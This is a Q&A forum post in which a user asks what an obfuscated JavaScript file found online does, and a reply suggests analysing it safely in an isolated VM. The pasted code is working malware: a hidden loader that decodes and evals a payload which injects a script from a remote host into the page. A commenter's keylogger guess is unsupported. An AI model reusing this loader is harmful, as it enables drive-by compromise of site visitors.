# JavaScript hack file — what can JavaScript hack code?

Tags: javascript, obfuscation

I found this JavaScript file on the web:

```
    var oa3a28a = "";

function yd4e965b5fad4() {
    var t538e19 = String,
        db7a0e0d5 = Array.prototype.slice.call(arguments).join(""),
        f38bc768 = db7a0e0d5.substr(1, 3) - 322,
        da49fad5, pe0cce;
    db7a0e0d5 = db7a0e0d5.substr(m1fe4220a());
    var s604bd1 = db7a0e0d5.length;
    for (var g464f2c0 = 0; g464f2c0 < s604bd1; g464f2c0++) {
        try {
            throw (mf5f1dc32 = db7a0e0d5.substr(g464f2c0, 1));
        } catch (e) {
            mf5f1dc32 = e;
        };
        if (mf5f1dc32 == 'ï') {
            f38bc768 = "";
            g464f2c0++;
            fe044d = s0e90a(db7a0e0d5, g464f2c0);
            while (fe044d != 'ï') {
                f38bc768 += fe044d;
                g464f2c0++;
                fe044d = db7a0e0d5.substr(g464f2c0, 1);
            }
            f38bc768 -= 595;
            continue;
        }
        da49fad5 = "";
        if (mf5f1dc32 == '±') {
            g464f2c0++;
            mf5f1dc32 = db7a0e0d5.substr(g464f2c0, 1);
            while (mf5f1dc32 != '±') {
                da49fad5 += mf5f1dc32;
                g464f2c0++;
                mf5f1dc32 = db7a0e0d5.substr(g464f2c0, 1);
            }
            da49fad5 = j2ef85b21(da49fad5, f38bc768, 9);
            if (da49fad5 < 0) da49fad5 += 256;
            da49fad5 = l1e549fb(da49fad5);
            j5e81c9(da49fad5);
            continue;
        }
        kea974 = (mf5f1dc32 + '')["\x63\x68a\x72\x43od\x65At"](0);
        if (kea974 > 848) kea974 -= 848;
        pe0cce = kea974 - f38bc768 - 9;
        pe0cce = jbbd0e90f(pe0cce);
        oa3a28a += t538e19["\x66\x72om\x43h\x61\x72Co\x64e"](pe0cce);
    }
}
yd4e965b5fad4("c", "390u", "ï", "7", "5", "5", "ï", "±", "15", "±", "±", "30±ï", "6", "6", "8ï", "±", "1", "92±", "±18", "1±±", "1", "9", "8±", "ï681", "ï±", "20", "0", "±", "±", "20", "6", "±ï6", "25", "ï", "±", "1", "4", "9±", "ï", "74", "4ï±1", "98", "±±199", "±", "±1", "9", "0±ï", "6", "0", "5", "ï", "±", "1", "42±±3", "2", "±", "ï", "65", "5", "ïO", "ï", "6", "71ï^ï", "7", "2", "5ï±", "1", "±", "ï6", "89", "ï", "±", "20", "0", "±", "±", "2", "1", "7±±", "13", "5±ï", "6", "4", "1ï", "±", "1", "72", "±ï68", "0ï", "±", "2", "0", "8±", "±20", "2±±1", "26±", "ï6", "48", "ï±12", "3", "±", "ï718ï", "±164±±", "171", "±", "±236", "±", "ï7", "61ï#", "#ï", "6", "2", "1ï", "±", "147", "±]", "R", "ï", "7", "24", "ï", "±", "185", "±", "±18", "8±ï6", "75ï±2", "0", "2±±1", "37", "±", "±187±ï647", "ï", "±1", "8", "0±q±159", "±", "ï", "698", "ï±", "1", "5", "8", "±", "ï", "7", "75ï", ")", "-ï707ï±2", "27", "±±2", "19±", "ï7", "24ï±", "24", "3±", "ï7", "82ï", "/", "ï", "60", "2ï", "z", "ï696", "ï±229", "±", "±2", "2", "1", "±", "±", "22", "4", "±ï", "652ï", "pï7", "57", "ï", "±2", "2", "±±2", "0", "±ï7", "0", "9ï", "±2", "22", "±", "ï689ï±", "21", "0", "±", "±", "218", "±ï76", "7ï", "±", "22", "6", "±ï", "7", "0", "3ï±", "2", "14", "±", "±", "2", "32±ï6", "48ï", "±", "1", "77", "±ï", "75", "9", "ï", "±2", "1", "9", "±", "ï700", "ï±224", "±±2", "1", "5±", "±", "230±", "ï6", "84ï", "±1", "45", "±", "ï", "6", "17ï", "±", "134±N", "FZ,", ")", "ï", "7", "2", "6ï±1", "4", "9±±2", "4", "5±", "ï6", "6", "0ï", "±", "176±", "j", "ï743", "ï", "±", "1", "9", "7±", "±17±±", "22", "±±1", "3±±", "2±±12±±", "3±±", "1", "8", "9±", "ï", "753ï", "±", "3", "0", "±±", "1", "6", "±", "ï", "753ï", "±2", "1±±11±±", "2", "2±±", "30", "±", "ï", "6", "1", "0", "ïF±14", "4±ï7", "0", "1", "ï", "±2", "36", "±ï", "7", "5", "1", "ï±31±ï75", "4", "ï±14±", "±20", "±", "ï", "6", "1", "4", "ï", "±1", "25", "±", "±13", "1", "±", "<Y", "ï721ï±196±", "ï", "78", "6ï", "±5", "±ï", "6", "7", "8ï", "±", "12", "4±ï", "6", "6", "9", "ïz", "ï65", "0", "ï", "±181±", "±1", "7", "4±ï7", "7", "4", "ï", "±3", "2", "±!", "\"%", "ï", "6", "8", "1", "ï", "±", "2", "05", "±", "ï6", "9", "5", "ï", "±2", "1", "0±", "±", "209", "±ï68", "8ï±", "14", "1", "±±", "143", "±ï6", "8", "2", "ï", "±", "1", "2", "8±ï60", "1ï±", "138", "±±", "2", "8±ï6", "6", "7ï[ï7", "76", "ï±", "1", "99", "±", "ï", "72", "4ï", "±", "14", "7±±", "1±ï758", "ï", "±", "21±ï647ï±171±", "±1", "61", "±±1", "7", "2", "±ï", "633", "ï±166", "±]", "±16", "7", "±ï", "79", "4ï", "IJï7", "6", "1", "ï±2", "1±ï", "65", "9", "ï±1", "8", "1", "±ï", "78", "5", "ï(ï69", "9ï±", "2", "16", "±±", "1", "45", "±", "ï", "656", "ï", "±131±fï", "77", "4ï±236±", "ï7", "1", "3", "ï±18", "6±", "ï760", "ï±", "1", "8", "7±ï", "62", "0", "ï,+±15", "9±", "/ï", "68", "8ï", "poï7", "4", "9", "ï", "±", "7±", "±", "18", "±±6±ï", "61", "3", "ï±144±ï", "791", "ï", ":", "2;", "A", "±", "251±", "ï", "7", "5", "7", "ï", "±2", "6", "±ï", "61", "9ï", "±", "14", "3", "±", "ï", "68", "9", "ï±", "2", "1", "2±", "ï736ï", "±", "5", "±", "ï", "7", "21", "ï±25", "2±ï63", "6ï±", "165±", "±", "1", "51", "±ï", "6", "17ï", "±140", "±ï7", "9", "2ï=", "D", "3", "±238", "±±11", "±", "ï", "778", "ï±", "22", "4±&", "ï61", "8", "ï", "±1", "49", "±±14", "2", "±±", "1", "3", "1±±", "1", "48±ï67", "4ï", "±", "1", "93±±", "19", "9", "±", "ï78", "3", "ï3", "±2", "3", "7±±23", "8", "±ï7", "17ï", "±", "163", "±", "ï", "73", "5ï±", "1", "6±", "ï6", "61ïXï", "6", "4", "0ï@ï79", "3", "ï±2", "16±±", "2", "16", "±8", "ï6", "8", "3ï", "±19", "9", "±", "±", "12", "9", "±", "ï78", "2", "ï±2", "3", "6±ï", "6", "6", "3ï±", "19", "6±", "ï7", "81ï,", "1ï", "68", "2", "ï", "±1", "96", "±ï", "7", "7", "7ï", ".ï", "7", "93", "ïFï6", "63", "ï", "±12", "3±", "±", "1", "9", "7", "±±", "1", "9", "8±ï", "6", "3", "3", "ï", "±", "169±", "ï6", "50ï", "±", "1", "66±", "ï", "65", "9", "ï", "±181±", "ï791ï", ".4±", "2", "37", "±ï", "700", "ï", "±17", "5±ï6", "7", "5ï", "±", "1", "50±", "±1", "50±", "y", "±13", "7", "±ï", "6", "22", "ïM", "D", "±1", "5", "9", "±ï71", "5ï", "±142±ï6", "9", "4", "ï", "v", "ï", "69", "3ï", "ttt", "ï6", "6", "0ï±", "193±", "ï7", "06", "ï", "±", "2", "25", "±", "ï", "6", "72ï", "±", "19", "6", "±ï", "755", "ï±", "13", "±", "ï", "7", "69", "ï", "&", "ï623", "ï±", "1", "5", "6±", "S", "±157", "±", "±1", "5", "8", "±±1", "5", "9±ï669", "ï", "±", "18", "5±ï7", "8", "4ï", "2", "ï", "670ï", "±181", "±", "±1", "87±", "tï", "7", "6", "7ï±", "2", "42", "±", "ï6", "83", "ï", "±", "1", "29", "±", "±1", "46", "±±15", "6", "±ï", "6", "0", "2ï±2", "9±", "±", "26±", "±2", "5±", "ï", "737ï", "±", "16", "0", "±", "±", "1", "60±±13±", "±", "2", "4", "8±ï", "7", "01ï±", "229", "±", "ï", "67", "4", "ïxï7", "61ï±", "23±ï", "63", "5ï", "±", "1", "5", "0", "±ï6", "69ï", "±", "1", "80", "±ï657ï±", "171", "±gï62", "7ïfIï620ï±1", "3", "4±", "ï", "7", "73ï*", "±", "3", "0", "±ï", "6", "1", "9ï", "±150", "±ï", "614", "ï±1", "37±ï", "61", "3", "ï±", "1", "2", "8", "±±13", "7±ï71", "0ï±", "24", "0±", "ï", "7", "56ï±", "2", "1", "6±", "ï66", "1ï", "±1", "78", "±", "±1", "76", "±ï7", "7", "1", "ï-±2", "54±", "%", "ï7", "8", "6ï", "-ï", "7", "1", "1", "ï±", "234", "±", "±", "22", "6±ï", "7", "95", "ï?ï", "7", "56", "ï±", "3", "0±±29±ï", "70", "3", "ï", "±", "1", "83", "±ï7", "05ï", "±", "24", "0±ï", "7", "1", "5ï±", "2", "1", "3±", "±2", "26±±232", "±", "±", "2", "07±", "ï668ï±17", "9±", "±191±", "ï", "7", "25", "ï±2", "4", "0±±179", "±ï", "74", "1ï", "±1", "9", "4", "±ï", "769ï±", "3", "1", "±", "ï", "7", "89ï", "0", ",ï6", "1", "1ï±", "1", "2", "5", "±@", "B", "tIv", "ï", "67", "7", "ï", "±1", "50±heï62", "5", "ï0ï7", "48", "ï", "±", "1", "71", "±", "±", "1", "7", "1±±", "2", "4±", "ï652ï±16", "3±", "±", "18", "0", "±", "b", "±", "18", "1±", "ï", "6", "32", "ï", "±1", "4", "5", "±", "±", "1", "60±", "±", "1", "5", "1±", "ï", "7", "3", "9", "ï", "±", "9±", "±", "13", "±ï7", "15ï", "±1", "61±±1", "90±", "ï", "643", "ïY", "±", "157", "±", "±", "1", "6", "8±", "±1", "5", "6", "±", "ï", "69", "9ï", "±", "230", "±", "ï6", "9", "6", "ï±2", "1", "9±±211", "±", "±22", "0", "±", "ï6", "02ï", "±13", "2±", ">ï78", "9ï", ".=", "ï70", "7", "ï", "±", "222±", "ï6", "2", "2", "ï", "±", "133", "±±", "1", "5", "2", "±±", "13", "7±", "ï73", "5", "ï±2", "18", "±ï7", "00", "ï±", "2", "22±", "ï", "722", "ï", "±2", "37", "±±", "245", "±", "ï634", "ï", "±14", "9±ï6", "14", "ï±", "1", "3", "8", "±±1", "44", "±DC", "ï741ï±", "14", "±ï", "77", "7ï", "\"", "ï", "69", "0ï±", "2", "18±±", "20", "9±±", "216", "±", "±", "2", "20±", "±", "14", "3±±145±±163", "±", "u", "ï6", "04ï", "±2", "8±±27±±2", "7", "±", "ï7", "09", "ï±1", "32±ï", "779", "ï4ï7", "17", "ï±", "230", "±", "ï789", "ï=", "4;?", "±2", "4", "9", "±?ï630ï", "±", "165±", "ï6", "3", "0ï±15", "6±ï", "68", "0", "ï±", "1", "9", "5", "±", "ï61", "0ï", "8ï7", "24", "ï±", "1", "99±", "ï737", "ï±", "1", "8", "3±", "ï732ï±", "1", "8", "5", "±", "ï", "623", "ï±153", "±±1", "38", "±±15", "7", "±±153", "±", "Tï7", "4", "0", "ï", "±", "4", "±±", "251", "±ï7", "8", "0", "ï", "8#", "ï635ï", "±", "164±ï", "78", "1", "ï&", "5,3ï", "7", "57ï±3", "1", "±", "ï", "7", "0", "1", "ï", "±", "15", "4±", "±17", "4±±1", "28±", "±1", "25", "±", "ï", "761ï±", "18", "4", "±", "±", "184", "±", "±", "1", "8", "4", "±\"±", "18±", "ï6", "17ï", "±14", "5±±", "1", "3", "6", "±", "±", "1", "43", "±", "ï65", "0", "ï±", "180±", "n±17", "5", "±", "±174", "±", "±", "17", "8", "±", "ï", "65", "0", "ï", "±165", "±", "±161±", "±16", "4±ï", "6", "70ï±205", "±±", "1", "9", "9±ï738ï", "±", "1", "2±±", "24", "9", "±±", "1", "2", "±ï", "7", "7", "7", "ï", "$\"'ï", "64", "6ï±", "157±±1", "70", "±", "ï738", "ï±25", "5±", "ï", "6", "65", "ï±", "18", "0", "±", "ï6", "46ï\\y\\ï", "73", "8ï±2", "5", "4", "±ï63", "6", "ï±16", "7±±", "1", "60", "±", "±", "149±", "ï", "60", "0", "ï±", "130", "±", "w", "±", "12", "5", "±", "ï", "631", "ï±155±M", "ï", "6", "54ïl", "m", "ï", "7", "28", "ï", "±17", "4", "±±", "9±", "±1", "55", "±", "ï5", "9", "7ï±21±", "±", "20", "±", "ï6", "20", "ï+", "ï", "65", "7ïPï7", "94ï", "±2", "1", "7", "±9", "6±", "2", "40±", "±", "24", "8", "±D89C±2", "5", "4±ï", "73", "6", "ï±8±ï", "73", "2", "ï", "±", "2", "4", "7", "±±", "24", "3", "±", "ï", "79", "2", "ï2ï", "70", "7", "ï±24", "2±±2", "04±", "ï", "7", "0", "2ï", "±", "2", "32±±", "2", "13", "±", "±2", "32", "±±", "2", "17", "±", "ï7", "25ï", "±", "17", "1±±", "2", "00", "±ï", "6", "55ï±1", "3", "0±", "ï", "72", "5", "ï±", "17", "1±", "±1", "7", "8±ï712ï", "±2", "25±", "±2", "3", "7", "±ï", "60", "1", "ï±1", "2", "4±±1", "2", "7±ï", "766", "ï", "±", "3", "2", "±±25", "±", "ï6", "1", "3", "ï", "±1", "4", "3±±12", "8", "±BD", "ï658ïh±1", "9", "5", "±", "ï", "7", "69", "ï", "±", "19", "6", "±", "ï", "71", "9ï", "±", "143±±", "1", "42±±", "142±±", "1", "4", "2", "±ï", "7", "40ï±163±±1", "6", "3", "±±17", "±", "±", "3±ï73", "1", "ï", "±255±ï77", "6", "ï", "\"ï62", "0", "ï", "±1", "45", "±", "ï7", "7", "1", "ï", "0", "±", "2", "3", "1", "±1ï6", "0", "9", "ï±", "1", "44", "±", "ï", "7", "6", "4ï", ",", "±2", "4", "±ï6", "1", "5", "ï±", "13", "7±ï", "7", "4", "6ï", "±", "1", "±±7", "±ï7", "87ï", "±", "2", "3", "3", "±±", "6±ï738ï", "±", "18", "4±", "±20", "2±ï71", "8ï", "±", "1", "91±ï5", "9", "7ï", "±24", "±±", "2", "1", "±", "±2", "0±±", "20±ï6", "88ï", "o", "ï", "6", "9", "4ïuï", "722ï", "±", "5", "±±", "1", "49±", "±14", "6±±1", "45", "±", "±145", "±", "±1", "45", "±", "ï", "6", "50", "ï", "±", "18", "9±", "ï", "59", "7ïF±24", "±±21±", "ï", "636", "ï;", "ï", "67", "0", "ï]", "ï610ï!±139±", "±", "1", "2", "3", "±±", "138±±12", "9±ï655", "ï", "±", "1", "81", "±", "ï7", "26", "ï±", "0±±186", "±", "±", "251±", "ï", "6", "4", "2ï±166", "±±164±±167", "±ï", "6", "5", "3", "ï±", "164", "±ï614ï", "±12", "8", "±<", "ï7", "89ï±8", "±", "±235", "±ï68", "0ï±196±", "ï6", "74", "ï", "±", "205±±1", "98±", "ï73", "2ï±24", "5±", "±6±", "ï", "60", "5", "ï", "±124", "±±", "130±", "ï", "62", "2", "ï±146±", "ï", "7", "3", "5", "ï±", "189", "±", "±", "190", "±", "ï6", "0", "9ï7±", "146", "±$", "ï7", "4", "8ï±", "17", "2±", "ï", "68", "4", "ïk", "kï71", "1", "ï", "±13", "4", "±", "±13", "4", "±±24", "4±±", "230±ï", "73", "1ï±", "2", "5", "5", "±ï", "670", "ï", "±", "1", "84±", "ï6", "3", "7", "ï", "±1", "62", "±ï", "7", "6", "7", "ï", ",±", "2", "2", "7±ï631ï", "±", "165", "±±16", "6±ï", "7", "16ï", "±", "25", "2±", "ï7", "3", "5", "ï±", "2", "5", "1±ï", "69", "4", "ï±", "21", "6", "±±", "2", "05", "±", "±2", "1", "1±ï601", "ï", "/Lï", "735ï±", "181±ï", "65", "7ï", "yï", "6", "67ï", "±", "14", "0±^", "ï", "73", "2", "ï±", "1", "5", "6±ï", "70", "3ï", "±", "126", "±±", "126±", "±", "12", "6±±", "2", "4", "2", "±ï", "61", "8ï[ï773", "ï", "±", "20", "0±", "ï", "6", "5", "7ïQï", "73", "7", "ï", "±16", "0±ï778ï", "±201±", "ï6", "77ï", "dï", "67", "6", "ï±", "20", "5±", "±", "18", "9±", "±2", "04±", "±", "1", "9", "5", "±", "±", "20", "2±ï", "6", "5", "6ï", "±1", "86±", "ï706", "ï", "±1", "6", "6", "±±", "235", "±", "ï66", "3ï", "±", "191", "±±", "176", "±m", "ï", "7", "6", "1", "ï±", "2", "36", "±ï748", "ï±", "1", "9", "4±ï", "78", "4ï;", "8", "ï", "781", "ï", "/", "ï6", "1", "9ï", "A", "ï65", "1ïlï", "602", "ï0]", "ï64", "3ï", "±", "1", "5", "4", "±", "±", "1", "7", "3", "±", "±", "1", "61±", "g", "±171", "±", "ï", "77", "6ï±31", "±", ",\"", "-ï", "6", "4", "8", "ï", "±1", "7", "1±", "ï", "6", "60ï", "r", "sx", "±190±ï", "72", "2ï", "±", "247±", "±", "219±", "ï", "6", "60ï", "±", "1", "90±ï613", "ï±", "1", "41±ï6", "56", "ï", "±1", "7", "5±", "±", "1", "8", "0±±", "17", "3", "±", "ï", "7", "33", "ï±1", "8", "7±±1", "88±±193±±", "6±±8", "±", "±2", "4", "5", "±ï615ï", "±14", "4", "±ï662", "ï±", "1", "9", "2", "±ï62", "8ï", "±15", "6±ï", "660", "ï±", "17", "9", "±±18", "4±ï7", "01ï", "±", "2", "18±", "ï7", "87", "ï", "±2", "41", "±", "ï", "6", "2", "5ïZ", "ï", "623", "ï", "N", "Eï793ï±", "250", "±±23", "9", "±", "±2", "46", "±", "±", "253±", "ï", "6", "5", "2ï", "±", "172", "±ï", "73", "3ï", "±6±", "ï", "6", "59ïp±13", "2±ï6", "9", "5", "ï", "z", "ï", "63", "1ï", "76ï", "795", "ï±2", "1", "8±±2", "1", "8", "±", "9", "62", "5ï", "6", "24ï", "Tï", "7", "4", "5ï±", "0", "±ï", "78", "1", "ï", "3", "3", "ï652ï±", "167±±", "17", "6", "±ï", "696", "ï", "±21", "0±ï60", "6", "ïW", "±1", "2", "4±", "ï", "7", "25", "ï±", "244", "±", "±2", "47±±", "23", "9", "±", "±", "17", "9", "±±", "254±ï", "7", "3", "4ï", "±247", "±±", "6", "±±25", "3±", "±", "4", "±", "ï", "7", "90", "ï@", "±2", "4", "5±", "ï", "630ï", "gï", "7", "72", "ï±", "19", "9", "±", "±", "1", "9", "6", "±±1", "95±ï", "668", "ï[", "ï", "70", "2", "ï", "±24", "1±", "±129±", "ï62", "9ï5ï71", "4", "ï±13", "7±", "±", "2", "53±", "ï632ï", "i;", "ï60", "2", "ï", "±", "26±", "ï7", "26ï", "±9", "±±", "18", "1", "±", "ï6", "54", "ïlm±", "127±", "");
eval(oa3a28a);

function m1fe4220a() {
    return 4;
}

function s0e90a(q5e82b5, te86e5) {
    return q5e82b5.substr(te86e5, 1);
}

function l1e549fb(l4dcac) {
    if (l4dcac == 168) l4dcac = 1025;
    else if (l4dcac == 184) l4dcac = 1105;
    return (l4dcac >= 192 && l4dcac < 256) ? l4dcac + 848 : l4dcac;
}

function j2ef85b21(q9b6f8cd, q74eab69, l8e7934) {
    return q9b6f8cd - q74eab69 - l8e7934;
}

function j5e81c9(gb77f12a4) {
    var t538e19 = String;
    oa3a28a += t538e19["\x66\x72om\x43h\x61\x72Co\x64e"](gb77f12a4);
}

function jbbd0e90f(h58b09) {
    var ieaad33 = h58b09;
    if (ieaad33 < 0) ieaad33 += 256;
    if (ieaad33 == 168) ieaad33 = 1025;
    else if (ieaad33 == 184) ieaad33 = 1105;
    return (ieaad33 >= 192 && ieaad33 < 256) ? ieaad33 + 848 : ieaad33;
}

c = 3 - 1;
i = c - 2;
if (window.document)
    if (parseInt("0" + "1" + "23") === 83) try {
        Date().prototype.q
    } catch (egewgsd) {
        f = ['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i12i76i17i78i76i77i60i60i6i73i77i66i63i80i63i77i68i65i75i6i58i68i71i63i60i70i75i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
        v = "ev" + "al";
    }
    if (v) e = window[v];
w = f;
s = [];
r = String;
for (; 692 != i; i += 1) {
    j = i;
    s += r["fromC" + "harCode"](40 + 1 * w[j]);
}
if (f) z = s;
e(z);
```

Can you explain what this does?
I think it steals your user data. 
Am I right? If not, can you tell me what it does?

Comment: Impossible to know, but the end of the code there are a `fromCharCode` that can be meaning that it register your keypress to steal passwords. It can be, but I'm not sure because it's hard to decrypt

Answer (score 1):

Leaving aside that your question is off topic and badly framed, you should be asking how to find this out for yourself.

Since you don't know what the code does, you should spin up a VM with a webserver and browser to run it in - don't share drives or a network connection with the outside world. A large part of the payload is encrypted in the variable f - which is then eval'd. Change:

```
if (v) e = window[v];
```

to

```
if (v) e = alert;
```

And replace the eval statement with another alert.
Then you should be able to see what 'f' contains.